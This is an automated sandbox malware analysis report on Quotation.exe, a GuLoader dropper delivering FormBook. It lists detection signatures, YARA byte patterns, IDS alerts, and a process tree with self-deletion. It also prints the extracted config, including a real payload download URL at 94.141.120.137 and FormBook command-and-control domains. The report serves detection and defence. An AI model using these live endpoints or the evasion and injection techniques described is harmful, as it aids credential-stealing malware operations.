
Windows Analysis Report
Quotation.exe

Overview

General Information

Sample name: Quotation.exe
Analysis ID: 1554157
MD5: 0a4e34ccc6e3e118f225a4f38f731a14
SHA1: d8f89c49dbf6376607ea5379963bd95973fbfd18
SHA256: 5bdeae823decc2e03dbe71ea05e7ea871badc0865c0a2d0580d69761e1175900
Tags: exe, GuLoader, user-abuse_ch

Detection

FormBook, GuLoader
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Yara detected FormBook
Yara detected GuLoader
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Found direct / indirect Syscall (likely to bypass EDR)
Initial sample is a PE file and has a suspicious name
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Modifies the prolog of user mode functions (user mode inline hooks)
Queues an APC in another process (thread injection)
Sample uses process hollowing technique
Switches to a custom stack to bypass stack traces
Tries to detect virtualization through RDTSC time measurements
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to dynamically determine API calls
Contains functionality to read the PEB
Contains functionality to shutdown / reboot the system
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
May sleep (evasive loops) to hinder dynamic analysis
PE / OLE file has an invalid certificate
PE file contains executable resources (Code or Archives)
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Suricata IDS alerts with low severity for network traffic
Tries to resolve domain names, but no domain seems valid (expired dropper behavior)
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

  • System is w10x64
  • Quotation.exe (PID: 2232 cmdline: "C:\Users\user\Desktop\Quotation.exe" MD5: 0A4E34CCC6E3E118F225A4F38F731A14)
    • Quotation.exe (PID: 3288 cmdline: "C:\Users\user\Desktop\Quotation.exe" MD5: 0A4E34CCC6E3E118F225A4F38F731A14)
      • explorer.exe (PID: 1028 cmdline: C:\Windows\Explorer.EXE MD5: 662F4F92FDE3557E86D110526BB578D5)
        • colorcpl.exe (PID: 2284 cmdline: "C:\Windows\SysWOW64\colorcpl.exe" MD5: DB71E132EBF1FEB6E93E8A2A0F0C903D)
          • cmd.exe (PID: 6800 cmdline: /c del "C:\Users\user\Desktop\Quotation.exe" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
            • conhost.exe (PID: 6760 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cleanup
{"C2 list": ["www.84jys301.top/hy29/"], "decoy": ["obswell.online", "etflix.luxury", "ulunguwethu.store", "ulbcenter.shop", "nswering-service-mi-de-tt.click", "upport-marketplace84.click", "wepxbd163.lat", "mplants-doctors.today", "aofexf90yj.top", "hermodynamic.space", "dfg3n489.cyou", "off.gay", "alkak.cam", "ijanarko.net", "7tl.site", "yaanincma.store", "ires-47022.bond", "elek4dalt77.xyz", "foxsakepeople.online", "ndefeatedqs.shop", "ordseetouristik.reisen", "eviewmywebsite.xyz", "igitalcommandos.net", "eqtech.net", "5655600.xyz", "rbis.site", "entures-sharp.today", "atrixslotviral.xyz", "zrk148.ink", "nline-advertising-18349.bond", "unnify.net", "ylosnackpark.online", "sakasouzoku.net", "emonslayerlatinclub.xyz", "tus.live", "tm189vip.live", "eintix.store", "oinflogo.xyz", "nline-gaming-16655.bond", "uyglp.one", "ihjp69483.vip", "n6n.xyz", "veriox.xyz", "limtightwaistkh.shop", "roelitecraft.mom", "eifeigou.top", "inak.net", "audesa.shop", "ealclick.club", "oktopus.kids", "elisiaco.shop", "xvsk.global", "littlebitoffaith.net", "dc188link04.xyz", "tagprobe.band", "orldlullaby.net", "hswe.top", "ultankinglogin.world", "ustdoit.store", "bhishekanand.biz", "erminalplanner.app", "oopia-faktura.info", "a-consulting.online", "owboyaero.net"]}
Source | Rule | Description | Author | Strings
00000006.00000002.3257817647.0000000003080000.00000040.10000000.00040000.00000000.sdmp | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
00000006.00000002.3257817647.0000000003080000.00000040.10000000.00040000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security
00000006.00000002.3257817647.0000000003080000.00000040.10000000.00040000.00000000.sdmp | Windows_Trojan_Formbook_1112e116 | unknown | unknown
  • 0x6251:$a1: 3C 30 50 4F 53 54 74 09 40
  • 0x1cb80:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
  • 0xa9bf:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
  • 0x158a7:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
00000006.00000002.3257817647.0000000003080000.00000040.10000000.00040000.00000000.sdmp | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
  • 0x9908:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x9b72:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x156a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
  • 0x15191:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
  • 0x157a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
  • 0x1591f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
  • 0xa58a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
  • 0x1440c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
  • 0xb283:$sequence_7: 66 89 0C 02 5B 8B E5 5D
  • 0x1b8e7:$sequence_8: 3C 54 74 04 3C 74 75 F4
  • 0x1c8ea:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000006.00000002.3257817647.0000000003080000.00000040.10000000.00040000.00000000.sdmp | Formbook | detect Formbook in memory | JPCERT/CC Incident Response Group
  • 0x18809:$sqlite3step: 68 34 1C 7B E1
  • 0x1891c:$sqlite3step: 68 34 1C 7B E1
  • 0x18838:$sqlite3text: 68 38 2A 90 C5
  • 0x1895d:$sqlite3text: 68 38 2A 90 C5
  • 0x1884b:$sqlite3blob: 68 53 D8 7F 8C
  • 0x18973:$sqlite3blob: 68 53 D8 7F 8C
      No Sigma rule has matched
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-11-12T07:35:17.147775+0100 | 2022930 | 1 | A Network Trojan was detected | 20.12.23.50 | 443 | 192.168.2.5 | 49704 | TCP
2024-11-12T07:35:56.451141+0100 | 2022930 | 1 | A Network Trojan was detected | 20.12.23.50 | 443 | 192.168.2.5 | 49882 | TCP
2024-11-12T07:35:47.375106+0100 | 2803270 | 2 | Potentially Bad Traffic | 192.168.2.5 | 49836 | 94.141.120.137 | 80 | TCP


      AV Detection

Source: Quotation.exe | Avira: detected
Source: http://94.141.120.137/qVMezflLJCc194.bin | Avira URL Cloud: Label: malware
Source: 00000006.00000002.3257817647.0000000003080000.00000040.10000000.00040000.00000000.sdmp | Malware Configuration Extractor: FormBook (configuration identical to the JSON listed under Classification above)
Source: Quotation.exe | Virustotal: Detection: 16%
Source: Yara match | File source: 00000006.00000002.3257817647.0000000003080000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000006.00000002.3257861968.00000000030B0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000002.2567406164.0000000000170000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000006.00000002.3257499889.0000000000AC0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000002.2614406463.0000000033AC0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Submitted Sample | Integrated Neural Analysis Model: Matched 100.0% probability
Source: Quotation.exe | Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
Source: Quotation.exe | Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
      Source: Binary string: colorcpl.pdbGCTL source: Quotation.exe, 00000003.00000003.2566857744.0000000003E45000.00000004.00000020.00020000.00000000.sdmp, Quotation.exe, 00000003.00000003.2566913391.0000000003E3C000.00000004.00000020.00020000.00000000.sdmp, Quotation.exe, 00000003.00000002.2580408016.0000000003E3C000.00000004.00000020.00020000.00000000.sdmp, Quotation.exe, 00000003.00000002.2614695348.0000000033C70000.00000040.10000000.00040000.00000000.sdmp, Quotation.exe, 00000003.00000003.2567063480.0000000003E59000.00000004.00000020.00020000.00000000.sdmp, colorcpl.exe, 00000006.00000002.3257653081.0000000000BC0000.00000040.80000000.00040000.00000000.sdmp
      Source: Binary string: colorcpl.pdb source: Quotation.exe, 00000003.00000003.2566857744.0000000003E45000.00000004.00000020.00020000.00000000.sdmp, Quotation.exe, 00000003.00000003.2566913391.0000000003E3C000.00000004.00000020.00020000.00000000.sdmp, Quotation.exe, 00000003.00000002.2580408016.0000000003E3C000.00000004.00000020.00020000.00000000.sdmp, Quotation.exe, 00000003.00000002.2614695348.0000000033C70000.00000040.10000000.00040000.00000000.sdmp, Quotation.exe, 00000003.00000003.2567063480.0000000003E59000.00000004.00000020.00020000.00000000.sdmp, colorcpl.exe, 00000006.00000002.3257653081.0000000000BC0000.00000040.80000000.00040000.00000000.sdmp
      Source: Binary string: mshtml.pdb source: Quotation.exe, 00000003.00000001.2393775567.0000000000649000.00000020.00000001.01000000.00000007.sdmp
      Source: Binary string: wntdll.pdbUGP source: Quotation.exe, 00000003.00000002.2614754852.0000000033E20000.00000040.00001000.00020000.00000000.sdmp, Quotation.exe, 00000003.00000003.2515303655.0000000033AC1000.00000004.00000020.00020000.00000000.sdmp, Quotation.exe, 00000003.00000002.2614754852.0000000033FBE000.00000040.00001000.00020000.00000000.sdmp, Quotation.exe, 00000003.00000003.2517704817.0000000033C70000.00000004.00000020.00020000.00000000.sdmp, colorcpl.exe, 00000006.00000002.3258240253.0000000004DAE000.00000040.00001000.00020000.00000000.sdmp, colorcpl.exe, 00000006.00000003.2570205153.0000000004A69000.00000004.00000020.00020000.00000000.sdmp, colorcpl.exe, 00000006.00000002.3258240253.0000000004C10000.00000040.00001000.00020000.00000000.sdmp, colorcpl.exe, 00000006.00000003.2567985473.00000000048BF000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: wntdll.pdb source: Quotation.exe, Quotation.exe, 00000003.00000002.2614754852.0000000033E20000.00000040.00001000.00020000.00000000.sdmp, Quotation.exe, 00000003.00000003.2515303655.0000000033AC1000.00000004.00000020.00020000.00000000.sdmp, Quotation.exe, 00000003.00000002.2614754852.0000000033FBE000.00000040.00001000.00020000.00000000.sdmp, Quotation.exe, 00000003.00000003.2517704817.0000000033C70000.00000004.00000020.00020000.00000000.sdmp, colorcpl.exe, 00000006.00000002.3258240253.0000000004DAE000.00000040.00001000.00020000.00000000.sdmp, colorcpl.exe, 00000006.00000003.2570205153.0000000004A69000.00000004.00000020.00020000.00000000.sdmp, colorcpl.exe, 00000006.00000002.3258240253.0000000004C10000.00000040.00001000.00020000.00000000.sdmp, colorcpl.exe, 00000006.00000003.2567985473.00000000048BF000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: mshtml.pdbUGP source: Quotation.exe, 00000003.00000001.2393775567.0000000000649000.00000020.00000001.01000000.00000007.sdmp
Source: C:\Users\user\Desktop\Quotation.exe | Code function: 0_2_0040687E FindFirstFileW, FindClose | 0_2_0040687E
Source: C:\Users\user\Desktop\Quotation.exe | Code function: 0_2_00402910 FindFirstFileW | 0_2_00402910
Source: C:\Users\user\Desktop\Quotation.exe | Code function: 0_2_00405C2D GetTempPathW, DeleteFileW, lstrcatW, lstrcatW, lstrlenW, FindFirstFileW, FindNextFileW, FindClose | 0_2_00405C2D

      Networking

Source: Malware configuration extractor | URLs: www.84jys301.top/hy29/
Source: Network traffic | Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.5:49836 -> 94.141.120.137:80
Source: Network traffic | Suricata IDS: 2022930 - Severity 1 - ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow : 20.12.23.50:443 -> 192.168.2.5:49704
Source: Network traffic | Suricata IDS: 2022930 - Severity 1 - ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow : 20.12.23.50:443 -> 192.168.2.5:49882
Source: unknown | DNS traffic detected: query: www.rbis.site replaycode: Name error (3)
Source: unknown | DNS traffic detected: query: www.alkak.cam replaycode: Name error (3)
Source: global traffic | HTTP traffic detected: GET /qVMezflLJCc194.bin HTTP/1.1
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
    Host: 94.141.120.137
    Cache-Control: no-cache
Source: unknown | TCP traffic detected without corresponding DNS query: 94.141.120.137 (50 identical entries)
Source: global traffic | HTTP traffic detected: GET /qVMezflLJCc194.bin HTTP/1.1
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
    Host: 94.141.120.137
    Cache-Control: no-cache
Source: global traffic | DNS traffic detected: DNS query: www.rbis.site
Source: global traffic | DNS traffic detected: DNS query: www.alkak.cam
Source: Quotation.exe, 00000003.00000002.2580312950.0000000003E24000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://94.141.120.137/
Source: Quotation.exe, 00000003.00000002.2580312950.0000000003E24000.00000004.00000020.00020000.00000000.sdmp, Quotation.exe, 00000003.00000002.2580312950.0000000003DE8000.00000004.00000020.00020000.00000000.sdmp, Quotation.exe, 00000003.00000002.2613980293.00000000332E0000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: http://94.141.120.137/qVMezflLJCc194.bin
Source: Quotation.exe, 00000003.00000002.2580312950.0000000003DE8000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://94.141.120.137/qVMezflLJCc194.bins
Source: Quotation.exe, 00000003.00000002.2580312950.0000000003E24000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://94.141.120.137/s$#&
Source: explorer.exe, 00000005.00000002.3262290605.0000000009B0B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000000.2523519321.0000000009AF9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.3262290605.0000000009AF9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000000.2523519321.0000000009B0B000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0
Source: explorer.exe, 00000005.00000002.3257532764.0000000000F13000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000005.00000000.2519828963.0000000000F13000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crl.v
Source: explorer.exe, 00000005.00000002.3262290605.0000000009B0B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000000.2523519321.0000000009AF9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.3262290605.0000000009AF9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000000.2523519321.0000000009B0B000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl07
Source: explorer.exe, 00000005.00000002.3262290605.0000000009B0B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000000.2523519321.0000000009AF9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.3262290605.0000000009AF9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000000.2523519321.0000000009B0B000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootG2.crl0
Source: Quotation.exe | String found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
Source: explorer.exe, 00000005.00000002.3262290605.0000000009B0B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000000.2523519321.0000000009AF9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.3262290605.0000000009AF9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000000.2523519321.0000000009B0B000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://ocsp.digicert.com0
Source: explorer.exe, 00000005.00000000.2523519321.00000000099C0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.3262290605.00000000099C0000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://ocsp.digicert.comhttp://crl3.digicert.com/DigiCertGlobalRootG2.crlhttp://crl4.digicert.com/Di
Source: explorer.exe, 00000005.00000000.2522347519.0000000007DC0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000005.00000002.3261806381.0000000008870000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000005.00000000.2523095396.0000000008890000.00000002.00000001.00040000.00000000.sdmp | String found in binary or memory: http://schemas.micro
Source: explorer.exe, 00000005.00000003.3094316811.000000000C908000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.3266011804.000000000C8F0000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://www.84jys301.top
Source: explorer.exe, 00000005.00000003.3094316811.000000000C908000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.3266011804.000000000C8F0000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://www.84jys301.top/hy29/
Source: explorer.exe, 00000005.00000003.3094316811.000000000C908000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.3266011804.000000000C8F0000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://www.84jys301.top/hy29/www.ustdoit.store
Source: explorer.exe, 00000005.00000003.3094316811.000000000C908000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.3266011804.000000000C8F0000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://www.84jys301.topReferer:
Source: explorer.exe, 00000005.00000003.3094316811.000000000C908000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.3266011804.000000000C8F0000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://www.alkak.cam
Source: explorer.exe, 00000005.00000003.3094316811.000000000C908000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.3266011804.000000000C8F0000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://www.alkak.cam/hy29/
Source: explorer.exe, 00000005.00000003.3094316811.000000000C908000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.3266011804.000000000C8F0000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://www.alkak.cam/hy29/www.ulbcenter.shop
Source: explorer.exe, 00000005.00000003.3094316811.000000000C908000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.3266011804.000000000C8F0000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://www.alkak.camReferer:
Source: explorer.exe, 00000005.00000003.3094316811.000000000C908000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.3266011804.000000000C8F0000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://www.dfg3n489.cyou
Source: explorer.exe, 00000005.00000003.3094316811.000000000C908000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.3266011804.000000000C8F0000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://www.dfg3n489.cyou/hy29/
Source: explorer.exe, 00000005.00000003.3094316811.000000000C908000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.3266011804.000000000C8F0000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://www.dfg3n489.cyou/hy29/www.yaanincma.store
Source: explorer.exe, 00000005.00000003.3094316811.000000000C908000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.3266011804.000000000C8F0000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://www.dfg3n489.cyouReferer:
Source: explorer.exe, 00000005.00000003.3094316811.000000000C908000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.3266011804.000000000C8F0000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://www.eifeigou.top
Source: explorer.exe, 00000005.00000003.3094316811.000000000C908000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.3266011804.000000000C8F0000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://www.eifeigou.top/hy29/
Source: explorer.exe, 00000005.00000003.3094316811.000000000C908000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.3266011804.000000000C8F0000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://www.eifeigou.top/hy29/www.veriox.xyz
Source: explorer.exe, 00000005.00000003.3094316811.000000000C908000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.3266011804.000000000C8F0000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://www.eifeigou.topReferer:
Source: Quotation.exe, 00000003.00000001.2393775567.0000000000649000.00000020.00000001.01000000.00000007.sdmp | String found in binary or memory: http://www.ftp.ftp://ftp.gopher.
Source: explorer.exe, 00000005.00000003.3094316811.000000000C908000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.3266011804.000000000C8F0000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://www.n6n.xyz
Source: explorer.exe, 00000005.00000003.3094316811.000000000C908000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.3266011804.000000000C8F0000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://www.n6n.xyz/hy29/
Source: explorer.exe, 00000005.00000003.3094316811.000000000C908000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.3266011804.000000000C8F0000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://www.n6n.xyz/hy29/www.nline-advertising-18349.bond
Source: explorer.exe, 00000005.00000003.3094316811.000000000C908000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.3266011804.000000000C8F0000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://www.n6n.xyzReferer:
Source: explorer.exe, 00000005.00000003.3094316811.000000000C908000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.3266011804.000000000C8F0000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://www.nline-advertising-18349.bond
Source: explorer.exe, 00000005.00000003.3094316811.000000000C908000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.3266011804.000000000C8F0000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://www.nline-advertising-18349.bond/hy29/
Source: explorer.exe, 00000005.00000003.3094316811.000000000C908000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.3266011804.000000000C8F0000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://www.nline-advertising-18349.bond/hy29/www.zrk148.ink
Source: explorer.exe, 00000005.00000003.3094316811.000000000C908000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.3266011804.000000000C8F0000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://www.nline-advertising-18349.bondReferer:
Source: explorer.exe, 00000005.00000003.3094316811.000000000C908000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.3266011804.000000000C8F0000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://www.owboyaero.net
Source: explorer.exe, 00000005.00000003.3094316811.000000000C908000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.3266011804.000000000C8F0000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://www.owboyaero.net/hy29/
Source: explorer.exe, 00000005.00000003.3094316811.000000000C908000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.3266011804.000000000C8F0000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://www.owboyaero.net/hy29/www.84jys301.top
Source: explorer.exe, 00000005.00000003.3094316811.000000000C908000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.3266011804.000000000C8F0000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://www.owboyaero.netReferer:
Source: explorer.exe, 00000005.00000003.3094316811.000000000C908000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.3266011804.000000000C8F0000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://www.rbis.site
Source: explorer.exe, 00000005.00000003.3094316811.000000000C908000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.3266011804.000000000C8F0000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://www.rbis.site/hy29/
Source: explorer.exe, 00000005.00000003.3094316811.000000000C908000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.3266011804.000000000C8F0000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://www.rbis.site/hy29/www.alkak.cam
Source: explorer.exe, 00000005.00000003.3094316811.000000000C908000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.3266011804.000000000C8F0000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://www.rbis.siteReferer:
Source: explorer.exe, 00000005.00000003.3094316811.000000000C908000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.3266011804.000000000C8F0000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://www.ulbcenter.shop
Source: explorer.exe, 00000005.00000003.3094316811.000000000C908000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.3266011804.000000000C8F0000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://www.ulbcenter.shop/hy29/
Source: explorer.exe, 00000005.00000003.3094316811.000000000C908000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.3266011804.000000000C8F0000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://www.ulbcenter.shop/hy29/www.ulunguwethu.store
Source: explorer.exe, 00000005.00000003.3094316811.000000000C908000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.3266011804.000000000C8F0000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://www.ulbcenter.shopReferer:
Source: explorer.exe, 00000005.00000003.3094316811.000000000C908000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.3266011804.000000000C8F0000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://www.ulunguwethu.store
      Source: explorer.exe, 00000005.00000003.3094316811.000000000C908000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.3266011804.000000000C8F0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.ulunguwethu.store/hy29/
      Source: explorer.exe, 00000005.00000003.3094316811.000000000C908000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.3266011804.000000000C8F0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.ulunguwethu.store/hy29/www.n6n.xyz
      Source: explorer.exe, 00000005.00000003.3094316811.000000000C908000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.3266011804.000000000C8F0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.ulunguwethu.storeReferer:
      Source: explorer.exe, 00000005.00000003.3094316811.000000000C908000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.3266011804.000000000C8F0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.unnify.net
      Source: explorer.exe, 00000005.00000003.3094316811.000000000C908000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.3266011804.000000000C8F0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.unnify.net/hy29/
      Source: explorer.exe, 00000005.00000003.3094316811.000000000C908000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.3266011804.000000000C8F0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.unnify.net/hy29/www.ylosnackpark.online
      Source: explorer.exe, 00000005.00000003.3094316811.000000000C908000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.3266011804.000000000C8F0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.unnify.netReferer:
      Source: explorer.exe, 00000005.00000003.3094316811.000000000C908000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.3266011804.000000000C8F0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.ustdoit.store
